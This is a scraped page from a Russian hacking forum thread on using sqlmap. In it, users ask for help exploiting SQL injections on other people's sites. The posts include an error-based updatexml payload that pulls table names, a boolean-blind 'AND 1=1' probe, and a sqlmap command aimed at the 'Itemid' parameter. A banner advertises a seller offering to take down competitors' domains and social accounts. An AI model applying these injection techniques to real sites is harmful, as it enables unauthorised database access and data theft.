УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 68 из 115

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#671

01.06.2018, 18:56

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

Провел на форуме:
104689

Репутация: 1

Цитата:

Сообщение от RWD

↑
Было не раз такое.
Похоже что это не скуля, а просто ошибка.

не не это скуля

я иногда такие раскручивал но ща не получается

и там по ошибке ясно что скуля

#672

04.06.2018, 00:39

PoliGroS

Познающий

Регистрация: 29.03.2012

Сообщений: 77

Провел на форуме:
14367

Репутация: 0

Здравствуйте, есть сайт с sqj inject site.com/trata=0 or updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--.

Как мне его скормить эту уязвимость sqlmaпу что б я уже с ней мог в нем работать, вывод таблиц, парсинг информации и тд. Спасибо

#673

07.06.2018, 18:27

GoodBoy

Познающий

Регистрация: 24.07.2017

Сообщений: 32

Провел на форуме:
8978

Репутация: 0

Доброго времени суток. Решил пробежать один сайт при помощи sqlmap --crawl.

Он нашел один параметр и начал крутить, но неудачно.

.SpoilerTarget" type="button">Spoiler
http://site.com/index.php?Itemid=41 +AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content &type=atom&view=category
Есть ли тут sql?

#674

07.06.2018, 18:41

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от GoodBoy

↑
Доброго времени суток. Решил пробежать один сайт при помощи sqlmap --crawl.
Он нашел один параметр и начал крутить, но неудачно.
Spoiler
http://site.com/index.php?Itemid=41
+AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content &type=atom&view=category
Есть ли тут sql?

Да есть.

#675

07.06.2018, 18:59

GoodBoy

Познающий

Регистрация: 24.07.2017

Сообщений: 32

Провел на форуме:
8978

Репутация: 0

Цитата:

Сообщение от BabaDook

↑
Да есть.

Спасибо за ответ. Не составит ли вам труда показать пример запроса под этот случай? И как вы определили, что тут присутствует инъекция?

#676

07.06.2018, 19:03

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от GoodBoy

Нет проблем:

Он нашел один параметр и начал крутить.

Запрос:

Код HTML:

http://site.com/index.php?Itemid=41 +AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category

Это Blind Boolean Based вектор

#677

07.06.2018, 19:12

GoodBoy

Познающий

Регистрация: 24.07.2017

Сообщений: 32

Провел на форуме:
8978

Репутация: 0

Цитата:

Сообщение от BabaDook

↑
Нет проблем:
Он нашел один параметр и начал крутить.
Запрос:

Код HTML:

http://site.com/index.php?Itemid=41 +AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category

Это Blind Boolean Based вектор

А как задать это в sqlmap, тут уязвимый параметр itemid или id? Что писать в --data?

#678

07.06.2018, 19:14

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от GoodBoy

↑
А как задать это в sqlmap, тут уязвимый параметр itemid или id? Что писать в --data?

sqlmap -u 'http://site.com/index.php?Itemid=41&format=feed&id=17&layout=blog&option=com_conten t&type=atom&view=category' -p Itemid

Itemid.

Не надо ничего в --data